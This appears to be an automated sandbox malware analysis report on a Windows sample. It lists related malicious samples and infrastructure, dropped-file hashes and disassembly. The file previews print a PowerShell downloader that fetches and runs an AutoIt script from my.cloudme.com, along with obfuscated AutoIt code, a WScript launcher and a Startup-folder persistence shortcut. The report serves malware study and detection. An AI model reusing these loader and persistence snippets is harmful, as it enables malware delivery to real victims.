                    https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://my.cloudme.compowershell.exe, 00000001.00000002.1809510030.000001C71D887000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://oneget.orgpowershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          83.140.241.4
                          my.cloudme.comSweden
                          39369PORT80SEfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528956
                          Start date and time:2024-10-08 14:11:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 54s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.expl.evad.winEXE@12/10@3/1
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 46
                          • Number of non-executed functions: 243
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe
                          TimeTypeDescription
                          08:11:59API Interceptor42x Sleep call for process: powershell.exe modified
                          08:12:44API Interceptor3159x Sleep call for process: InformationCheck.exe modified
                          08:13:02API Interceptor1962x Sleep call for process: SwiftWrite.pif modified
                          13:12:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          83.140.241.4T6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousUnknownBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  my.cloudme.comT6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  PORT80SEna.elfGet hashmaliciousMiraiBrowse
                                  • 82.96.23.36
                                  T6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  mirai.x86.elfGet hashmaliciousMiraiBrowse
                                  • 83.140.143.216
                                  botx.mips.elfGet hashmaliciousMiraiBrowse
                                  • 217.75.105.3
                                  Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 82.96.9.42
                                  62CajT4n8H.elfGet hashmaliciousUnknownBrowse
                                  • 83.140.44.136
                                  GpqAAlRMz4.elfGet hashmaliciousMoobotBrowse
                                  • 82.96.9.72
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  eshkere.batGet hashmaliciousXmrigBrowse
                                  • 83.140.241.4
                                  JFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                                  • 83.140.241.4
                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                  • 83.140.241.4
                                  SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                  • 83.140.241.4
                                  NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 83.140.241.4
                                  SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                  • 83.140.241.4
                                  QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 83.140.241.4
                                  po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                  • 83.140.241.4
                                  PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                  • 83.140.241.4
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifT6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        file.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousRemcosBrowse
                                              SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousUnknownBrowse
                                                SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                  SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                                      C:\Users\Public\InformationCheck.exeT6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousRemcosBrowse
                                                                  SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousUnknownBrowse
                                                                    SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                      SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                        SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                          Category:dropped
                                                                          Size (bytes):3620039
                                                                          Entropy (8bit):4.736955843465757
                                                                          Encrypted:false
                                                                          SSDEEP:24576:qcvKQ2VLYaNQyTmm7tz64dFZS2qymrZEDXYUJwTRPVi+3MQt/+DnIJKXU4nKojHJ:c
                                                                          MD5:72763724603D6508FBBCDEC39CDA4D4D
                                                                          SHA1:3C837147E67B55121B59EAE7E42C8EC872E4D161
                                                                          SHA-256:BCE069F52CDA27A4EC001A2BB0E6605AE817E6B64BCAA6A007DE513C641D32CC
                                                                          SHA-512:A6CFCD7F382366E77585403ACB5B4A227EA9CA20A0A7028A360336E1D9C7CC8CD2DBA6C42E7DA8984B1E7BD9CEDED2810D33871542139A2F821164C9A7BCD7C9
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.620131693023677
                                                                          Encrypted:false
                                                                          SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                          MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                          SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                          SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                          SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Joe Sandbox View:
                                                                          • Filename: T6l6gPxwQU.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):380
                                                                          Entropy (8bit):5.116284509919443
                                                                          Encrypted:false
                                                                          SSDEEP:6:gsvPFyKoJZYZId25PaH9Ayz1gY1PaHzPMKds48QLh8JdWzH6mLF7djIXIINOQboA:xv9ZoFrAymYEzdHGHWzH6mL5dsfHb5M+
                                                                          MD5:7E5918EC14E800FE40280F727544F88D
                                                                          SHA1:510337BBF777624CCDD45402B50A54709AFE1DBF
                                                                          SHA-256:EA88240652FD5531C00665A03D4F78B8E8AC1ECC8C4014E5A3063996D29EB151
                                                                          SHA-512:02013E30AF60B2F81EE83ED7CABE08BEF60C2BCE7284E46EA620D7735C30B5A558F6F302CB7D53DA6EDB8ACC28BE7CB315F3A5C041AB22E7EAECEF73757DE89A
                                                                          Malicious:true
                                                                          Reputation:low
                                                                          Preview:$url = "https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt"..$outputFile = "C:\Users\Public\Details.au3"..$decodedRunooPath = "C:\Users\Public\InformationCheck.exe"......$content = Invoke-WebRequest -Uri $url -UseBasicParsing......$content.Content | Out-File -FilePath $outputFile -Encoding UTF8......Start-Process -FilePath $decodedRunooPath -ArgumentList $outputFile
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulJnp/p:NllU
                                                                          MD5:BC6DB77EB243BF62DC31267706650173
                                                                          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                          Malicious:false
                                                                          Preview:@...e.................................X..............@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\Public\InformationCheck.exe
                                                                          File Type:ASCII text, with very long lines (1266)
                                                                          Category:dropped
                                                                          Size (bytes):3620036
                                                                          Entropy (8bit):4.736940517668657
                                                                          Encrypted:false
                                                                          SSDEEP:24576:DcvKQ2VLYaNQyTmm7tz64dFZS2qymrZEDXYUJwTRPVi+3MQt/+DnIJKXU4nKojHJ:P
                                                                          MD5:9E8D5AA38FF56E9E7FD33459E9EF63DF
                                                                          SHA1:5CC576C041A709B739EA7FA46A702ECD2DC69F7C
                                                                          SHA-256:1A33298AFDC03C9AB7B5F9FA1017DDFBAE2C7D4EC6A381007F56F6C73C692F12
                                                                          SHA-512:7238F82A0C9618AE6C5A47A312ABDFC79DC8E44FB07BA80DBC613AF1D7F54B6B93F6F132ADACD9157219E1F421BFE3462C0C14D301A289048D40EFDD3B6807D6
                                                                          Malicious:false
                                                                          Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                          Process:C:\Users\Public\InformationCheck.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):184
                                                                          Entropy (8bit):4.736154105743425
                                                                          Encrypted:false
                                                                          SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                                          MD5:612D28A7A2758BAAF54DB34272446F87
                                                                          SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                                          SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                                          SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                                          Malicious:true
                                                                          Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                          Process:C:\Users\Public\InformationCheck.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):893608
                                                                          Entropy (8bit):6.620131693023677
                                                                          Encrypted:false
                                                                          SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                          MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                          SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                          SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                          SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                          Joe Sandbox View:
                                                                          • Filename: T6l6gPxwQU.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe, Detection: malicious, Browse
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):98
                                                                          Entropy (8bit):4.915531212533357
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                                          MD5:56D029782506F3E1F7EC40780D1DA27F
                                                                          SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                                          SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                                          SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                                          Malicious:true
                                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Entropy (8bit):7.327058241749548
                                                                          TrID:
                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:2'016'768 bytes
                                                                          MD5:1d2cf62e7874bb460b7258279a55ddf3
                                                                          SHA1:9a060f273aee924d7972a5ddd561a34f4510d64d
                                                                          SHA256:c5378718434462185d98c672106dbfd4efbc8d6b7a0c60efe79000f11c955ffa
                                                                          SHA512:c7c0d1d19b7d1b200f00199c6e8795f12ac2839fd9e4d19268f6d2c409df4afa1b898b97e71bee25f5b28c2b8d0e88364a1a528d17ccdcaed9c626e5916a6056
                                                                          SSDEEP:49152:v2EYTb8atv1orq+pEiSDTj1VyvBaYzDiu2wlNF9wGDOg8jLeO07B+Iy3AqMl1ZcK:uXbIrqmDiu2cNF9wGDc07B+yqm1Z
                                                                          TLSH:0795CF0973A4819DFEABE1B6CA22C657D6B17C458276861F01A47F763F337701A2E321
                                                                          File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                                          Icon Hash:03c341595179597f
                                                                          Entrypoint:0x14002549c
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x140000000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6703DEEA [Mon Oct 7 13:15:22 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:2
                                                                          File Version Major:5
                                                                          File Version Minor:2
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:2
                                                                          Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                                          Instruction
                                                                          dec eax
                                                                          sub esp, 28h
                                                                          call 00007F45D8857B60h
                                                                          dec eax
                                                                          add esp, 28h
                                                                          jmp 00007F45D885746Fh
                                                                          int3
                                                                          int3
                                                                          inc eax
                                                                          push ebx
                                                                          dec eax
                                                                          sub esp, 20h
                                                                          dec eax
                                                                          mov ebx, ecx
                                                                          dec eax
                                                                          mov eax, edx
                                                                          dec eax
                                                                          lea ecx, dword ptr [0009466Dh]
                                                                          dec eax
                                                                          mov dword ptr [ebx], ecx
                                                                          dec eax
                                                                          lea edx, dword ptr [ebx+08h]
                                                                          xor ecx, ecx
                                                                          dec eax
                                                                          mov dword ptr [edx], ecx
                                                                          dec eax
                                                                          mov dword ptr [edx+08h], ecx
                                                                          dec eax
                                                                          lea ecx, dword ptr [eax+08h]
                                                                          call 00007F45D8859079h
                                                                          dec eax
                                                                          lea eax, dword ptr [0009467Dh]
                                                                          dec eax
                                                                          mov dword ptr [ebx], eax
                                                                          dec eax
                                                                          mov eax, ebx
                                                                          dec eax
                                                                          add esp, 20h
                                                                          pop ebx
                                                                          ret
                                                                          int3
                                                                          dec eax
                                                                          and dword ptr [ecx+10h], 00000000h
                                                                          dec eax
                                                                          lea eax, dword ptr [00094674h]
                                                                          dec eax
                                                                          mov dword ptr [ecx+08h], eax
                                                                          dec eax
                                                                          lea eax, dword ptr [00094659h]
                                                                          dec eax
                                                                          mov dword ptr [ecx], eax
                                                                          dec eax
                                                                          mov eax, ecx
                                                                          ret
                                                                          int3
                                                                          int3
                                                                          inc eax
                                                                          push ebx
                                                                          dec eax
                                                                          sub esp, 20h
                                                                          dec eax
                                                                          mov ebx, ecx
                                                                          dec eax
                                                                          mov eax, edx
                                                                          dec eax
                                                                          lea ecx, dword ptr [0009460Dh]
                                                                          dec eax
                                                                          mov dword ptr [ebx], ecx
                                                                          dec eax
                                                                          lea edx, dword ptr [ebx+08h]
                                                                          xor ecx, ecx
                                                                          dec eax
                                                                          mov dword ptr [edx], ecx
                                                                          dec eax
                                                                          mov dword ptr [edx+08h], ecx
                                                                          dec eax
                                                                          lea ecx, dword ptr [eax+08h]
                                                                          call 00007F45D8859019h
                                                                          dec eax
                                                                          lea eax, dword ptr [00094645h]
                                                                          dec eax
                                                                          mov dword ptr [ebx], eax
                                                                          dec eax
                                                                          mov eax, ebx
                                                                          dec eax
                                                                          add esp, 20h
                                                                          pop ebx
                                                                          ret
                                                                          int3
                                                                          dec eax
                                                                          and dword ptr [ecx+10h], 00000000h
                                                                          dec eax
                                                                          lea eax, dword ptr [0009463Ch]
                                                                          dec eax
                                                                          mov dword ptr [ecx+08h], eax
                                                                          dec eax
                                                                          lea eax, dword ptr [00000021h]
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000xf7d5f.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f30000xa74.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
